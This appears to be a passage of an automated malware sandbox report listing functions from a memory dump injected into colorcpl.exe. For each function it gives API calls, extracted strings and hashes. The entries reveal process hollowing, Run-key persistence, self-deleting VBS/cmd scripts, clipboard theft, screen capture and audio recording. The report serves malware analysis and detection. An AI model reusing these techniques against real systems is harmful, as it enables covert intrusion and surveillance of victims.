                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                              • API String ID: 4127273184-3576401099
                                                              • Opcode ID: fece7682a97996d78b1ef29f0a0fd233996df34b01688cc3cb96b9e3ef37f454
                                                              • Instruction ID: a67e5e857ca8c826b8467fe6da7da6df76f6c474c044948bf94bbbe472dc10dc
                                                              • Opcode Fuzzy Hash: fece7682a97996d78b1ef29f0a0fd233996df34b01688cc3cb96b9e3ef37f454
                                                              • Instruction Fuzzy Hash: B511B725F837043FE818B5BD5D6BBAF281993C6A60F450559E7122FAC7D5C24642C3C6
                                                              Function 030DEEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,030D1F85,?,?,?,?,030D19DC,?,00000004), ref: 030DEF9A
                                                              • _wcschr.LIBVCRUNTIME ref: 030DF02A
                                                              • _wcschr.LIBVCRUNTIME ref: 030DF038
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,030D1F85,00000000,030D20A5), ref: 030DF0DB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                              • String ID:
                                                              • API String ID: 4212172061-0
                                                              • Opcode ID: 985a8c9bf8969d27e39efbf8950e36b6c32b786bc47d1a4e9f17e4c56e7a4c94
                                                              • Instruction ID: 60d93228ddb331dfd3f7977769427e2d1a86da44bb2f16c0d87d27bc4c1120a7
                                                              • Opcode Fuzzy Hash: 985a8c9bf8969d27e39efbf8950e36b6c32b786bc47d1a4e9f17e4c56e7a4c94
                                                              • Instruction Fuzzy Hash: 1761D639602706AADB24FB35DC45BAAB7ECEF44750F184469E91ADF180EB74E940C760
                                                              Function 030C98AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 030C99A4
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 030C99AE
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 030C99BB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 385bbae1be2bbf120bfb16599f58bda85bc67dc4ebe8e9331ce56274f9ea20f7
                                                              • Instruction ID: 2a36d71346f57c542bff15c7b596689fdb0eb2e1f369f252de34c9d81a5d77fc
                                                              • Opcode Fuzzy Hash: 385bbae1be2bbf120bfb16599f58bda85bc67dc4ebe8e9331ce56274f9ea20f7
                                                              • Instruction Fuzzy Hash: B231B47591221C9BCB61EF69D8887CDB7B8FF58310F5041EAE40CAB250E7349B858F45
                                                              Function 0309A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32(00000000), ref: 0309A65D
                                                              • GetClipboardData.USER32(0000000D), ref: 0309A669
                                                              • CloseClipboard.USER32 ref: 0309A671
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseDataOpen
                                                              • String ID:
                                                              • API String ID: 2058664381-0
                                                              • Opcode ID: 3a389912a397da8992e695e15072fe5180b7cbbd65ca7086f6a1e010be76faca
                                                              • Instruction ID: d8c9dbf5fd9f1250113854ec85cabf3d0c1c72cc3729523e82153890c07501ba
                                                              • Opcode Fuzzy Hash: 3a389912a397da8992e695e15072fe5180b7cbbd65ca7086f6a1e010be76faca
                                                              • Instruction Fuzzy Hash: B7E0C2307473249BEA20EB70F808B8EB7949FA0F21F05451AB41D9E148CB749800DBA8
                                                              Function 030C28FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,030C262F), ref: 030C2901
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 516ec3e50dbc80bc6cb4a46c9f7aaaf7d34b82bf177f8d08db4470dd00de78cf
                                                              • Instruction ID: b02d95c9822a52b3e10d13ce37e6ab7aa0f9b86ec828b42c17c3845ea1babb6a
                                                              • Opcode Fuzzy Hash: 516ec3e50dbc80bc6cb4a46c9f7aaaf7d34b82bf177f8d08db4470dd00de78cf
                                                              • Instruction Fuzzy Hash:
                                                              Function 030A6E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 030A6E98
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 030A6EA5
                                                                • Part of subcall function 030A72DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 030A730F
                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 030A6F1B
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F32
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F35
                                                              • DeleteObject.GDI32(00000000), ref: 030A6F38
                                                              • SelectObject.GDI32(00000000,00000000), ref: 030A6F59
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F6A
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F6D
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 030A6F91
                                                              • GetIconInfo.USER32(?,?), ref: 030A6FC5
                                                              • DeleteObject.GDI32(?), ref: 030A6FF4
                                                              • DeleteObject.GDI32(?), ref: 030A7001
                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 030A700E
                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 030A7026
                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 030A7095
                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 030A7104
                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 030A7128
                                                              • DeleteDC.GDI32(?), ref: 030A713C
                                                              • DeleteDC.GDI32(00000000), ref: 030A713F
                                                              • DeleteObject.GDI32(00000000), ref: 030A7142
                                                              • GlobalFree.KERNEL32(?), ref: 030A714D
                                                              • DeleteObject.GDI32(00000000), ref: 030A7201
                                                              • GlobalFree.KERNEL32(?), ref: 030A7208
                                                              • DeleteDC.GDI32(?), ref: 030A7218
                                                              • DeleteDC.GDI32(00000000), ref: 030A7223
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                              • String ID: DISPLAY
                                                              • API String ID: 479521175-865373369
                                                              • Opcode ID: d2ab732fb6e4899ff1758081f3716ad3510d3e569f9be3f673f956f09578bc26
                                                              • Instruction ID: 2605e09be2273d0ecbb8d49c361cee3ba4d629e13d0a4402add2630bf949dcb0
                                                              • Opcode Fuzzy Hash: d2ab732fb6e4899ff1758081f3716ad3510d3e569f9be3f673f956f09578bc26
                                                              • Instruction Fuzzy Hash: B0B16B35605704AFD760EFA8E844B6BBBE8FF88B10F04481DF9899B240DB35E905CB52
                                                              Function 030A642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 030A6474
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A6477
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 030A6488
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A648B
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 030A649C
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A649F
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 030A64B0
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A64B3
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 030A6555
                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 030A656D
                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 030A6583
                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 030A65A9
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 030A662B
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 030A663F
                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 030A667F
                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 030A6749
                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 030A6766
                                                              • ResumeThread.KERNEL32(?), ref: 030A6773
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 030A678A
                                                              • GetCurrentProcess.KERNEL32(?), ref: 030A6795
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 030A67B0
                                                              • GetLastError.KERNEL32 ref: 030A67B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                              • API String ID: 4188446516-3035715614
                                                              • Opcode ID: 5fcae474ebb997de07b223a2e9d37be2ab7cdca9d301b9baaea03c2b5a9f588d
                                                              • Instruction ID: 59abc7417ca2cc8267938a269ac24904fc3ba460656072c981c15666bcef3ec2
                                                              • Opcode Fuzzy Hash: 5fcae474ebb997de07b223a2e9d37be2ab7cdca9d301b9baaea03c2b5a9f588d
                                                              • Instruction Fuzzy Hash: 72A18CB0602309AFD750DFA8EC85B6BBBF8FF48745F080819F6959A250D77AD844CB15
                                                              Function 0309BFDE Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 281registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A12B5: TerminateProcess.KERNEL32(00000000,031021E8,0309E2B2), ref: 030A12C5
                                                                • Part of subcall function 030A12B5: WaitForSingleObject.KERNEL32(000000FF), ref: 030A12D8
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0309C0D6
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0309C0E9
                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0309C102
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0309C132
                                                                • Part of subcall function 0309A7F2: TerminateThread.KERNEL32(03099305,00000000,031021E8,0309BC76,?,03102200,pth_unenc,031021E8), ref: 0309A801
                                                                • Part of subcall function 0309A7F2: UnhookWindowsHookEx.USER32(?), ref: 0309A811
                                                                • Part of subcall function 0309A7F2: TerminateThread.KERNEL32(030992EF,00000000,?,03102200,pth_unenc,031021E8), ref: 0309A823
                                                                • Part of subcall function 030AA17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309C37D
                                                              • ExitProcess.KERNEL32 ref: 0309C389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                              • API String ID: 1861856835-1536747724
                                                              • Opcode ID: 3da7dcb6f204d579e45dc1a9666deebf3f32afb0df369c5ec1ddcfe65dfa3e1b
                                                              • Instruction ID: ca47ad61436336ee4903b27eae156e232bdfcb98b536cca70c23f83438ff89a3
                                                              • Opcode Fuzzy Hash: 3da7dcb6f204d579e45dc1a9666deebf3f32afb0df369c5ec1ddcfe65dfa3e1b
                                                              • Instruction Fuzzy Hash: 1191D0397073055FEA18F764E860AEF77E89FD4610F04092FE1869F1A1EF209D4AE652
                                                              Function 030A0EDA Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,03102200,03101FFC,00000000), ref: 030A0EF9
                                                              • ExitProcess.KERNEL32(00000000), ref: 030A0F05
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 030A0F7F
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 030A0F8E
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 030A0F99
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A0FA0
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A0FA6
                                                              • PathFileExistsW.SHLWAPI(?), ref: 030A0FD7
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 030A103A
                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 030A1054
                                                              • lstrcatW.KERNEL32(?,.exe), ref: 030A1066
                                                                • Part of subcall function 030AA17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 030A10A6
                                                              • Sleep.KERNEL32(000001F4), ref: 030A10E7
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 030A10FC
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 030A1107
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A110E
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A1114
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                              • String ID: .exe$WDH$exepath$open$temp_
                                                              • API String ID: 2649220323-3088914985
                                                              • Opcode ID: 523998985a9254b3a48e376a8606ba168ce9e29c311c3dc91c2262964ab3e030
                                                              • Instruction ID: 0ab0c227af2d875d76df8af78bbd503b1f395f6655460de6ec2125fd4910d578
                                                              • Opcode Fuzzy Hash: 523998985a9254b3a48e376a8606ba168ce9e29c311c3dc91c2262964ab3e030
                                                              • Instruction Fuzzy Hash: F551D175B0270DAFDF54FBE4BC58EEE33AD9B44610F000595F502AB181EF798E468A50
                                                              Function 030A8FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 030A90F2
                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 030A9106
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,030F3050), ref: 030A912E
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 030A9144
                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 030A9185
                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 030A919D
                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 030A91B2
                                                              • SetEvent.KERNEL32 ref: 030A91CF
                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 030A91E0
                                                              • CloseHandle.KERNEL32 ref: 030A91F0
                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 030A9212
                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 030A921C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                              • API String ID: 738084811-1354618412
                                                              • Opcode ID: cbba2fc95ff75384b1264cf49dd62024d34ddba3cc0dafa3ae538e9b6f55d862
                                                              • Instruction ID: 194ed80d1ca4c19fea59c12af07d67f7a6468e4fd706d91bc560af4561ad37ba
                                                              • Opcode Fuzzy Hash: cbba2fc95ff75384b1264cf49dd62024d34ddba3cc0dafa3ae538e9b6f55d862
                                                              • Instruction Fuzzy Hash: C751F3793063497FEA08FBB4EC94EFF369C9BC4298F00042EB1069A590DF654D48DA22
                                                              Function 0309B871 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 296fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0309B882
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,03101FFC), ref: 0309B89B
                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,03101FFC), ref: 0309B952
                                                              • _wcslen.LIBCMT ref: 0309B968
                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000), ref: 0309B9E0
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0309BA22
                                                              • _wcslen.LIBCMT ref: 0309BA25
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0309BA3C
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309BC2A
                                                              • ExitProcess.KERNEL32 ref: 0309BC36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                              • String ID: """, 0$6$C:\Windows\SysWOW64\colorcpl.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                              • API String ID: 2743683619-306929222
                                                              • Opcode ID: 70a228feaa2bac866f9704d6cf4b8972e25d0a2229c1e0bfc32316671a163525
                                                              • Instruction ID: bd3c36c52c26e0c6578dde533e58cc24efc96da8d1248ad3b10ffe82d6c57612
                                                              • Opcode Fuzzy Hash: 70a228feaa2bac866f9704d6cf4b8972e25d0a2229c1e0bfc32316671a163525
                                                              • Instruction Fuzzy Hash: FE918B3930A3456FEA1CF765EC60EEF77D9AFD0210F10082FE1468E190EE34994AE652
                                                              Function 03091A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 03091AB9
                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 03091AE3
                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 03091AF3
                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 03091B03
                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 03091B13
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 03091B23
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 03091B34
                                                              • WriteFile.KERNEL32(00000000,030FFA9A,00000002,00000000,00000000), ref: 03091B45
                                                              • WriteFile.KERNEL32(00000000,030FFA9C,00000004,00000000,00000000), ref: 03091B55
                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 03091B65
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 03091B76
                                                              • WriteFile.KERNEL32(00000000,030FFAA6,00000002,00000000,00000000), ref: 03091B87
                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 03091B97
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 03091BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Write$Create
                                                              • String ID: RIFF$WAVE$data$fmt
                                                              • API String ID: 1602526932-4212202414
                                                              • Opcode ID: 794de5f5b23d96a7bc1d5b5ef1680b38ad37c3b9152ba1673fd316f898a3aafc
                                                              • Instruction ID: 8d7592dbff738dff7238a62a9ca7062586e672ab3587a6b5cd7f2cdb7c3cff2b
                                                              • Opcode Fuzzy Hash: 794de5f5b23d96a7bc1d5b5ef1680b38ad37c3b9152ba1673fd316f898a3aafc
                                                              • Instruction Fuzzy Hash: 28415C726443197EE210DA51DC86FBF7EECEB85E50F40091AF644DA080D7A5A909DBB3
                                                              Function 030DC60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                              • String ID:
                                                              • API String ID: 3899193279-0
                                                              • Opcode ID: bfc21936189ca15314d3ca42bf3fb9569d35a3586c94d4c30e8f0b4348664f40
                                                              • Instruction ID: a140efa6cfb32025521a6160bc48f673d8570f11d656384e70ff0252b0752eb7
                                                              • Opcode Fuzzy Hash: bfc21936189ca15314d3ca42bf3fb9569d35a3586c94d4c30e8f0b4348664f40
                                                              • Instruction Fuzzy Hash: 74D16B75E077056FEB25EF789884BAEBBE8EF41310F0941ADE942DB284EB359500CB51
                                                              Function 030A37DC Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 030A382B
                                                              • LoadLibraryA.KERNEL32(?), ref: 030A386D
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 030A388D
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A3894
                                                              • LoadLibraryA.KERNEL32(?), ref: 030A38CC
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 030A38DE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A38E5
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 030A38F4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A390B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                              • API String ID: 2490988753-744132762
                                                              • Opcode ID: d052a33921f8e3f92346733d3407136dd9c4e3da1f4ccb19e6448e78d8a767f3
                                                              • Instruction ID: 82027d327d05b1634c866315711f76002da5f3205c64fa0439f820278e6bff31
                                                              • Opcode Fuzzy Hash: d052a33921f8e3f92346733d3407136dd9c4e3da1f4ccb19e6448e78d8a767f3
                                                              • Instruction Fuzzy Hash: 2B31077A907B15ABC320EBA8E848ECFB7EC9F85750F080A59F94497200D739D5048BA6
                                                              Function 030AA419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 030AA43B
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030AA47F
                                                              • RegCloseKey.ADVAPI32(?), ref: 030AA749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
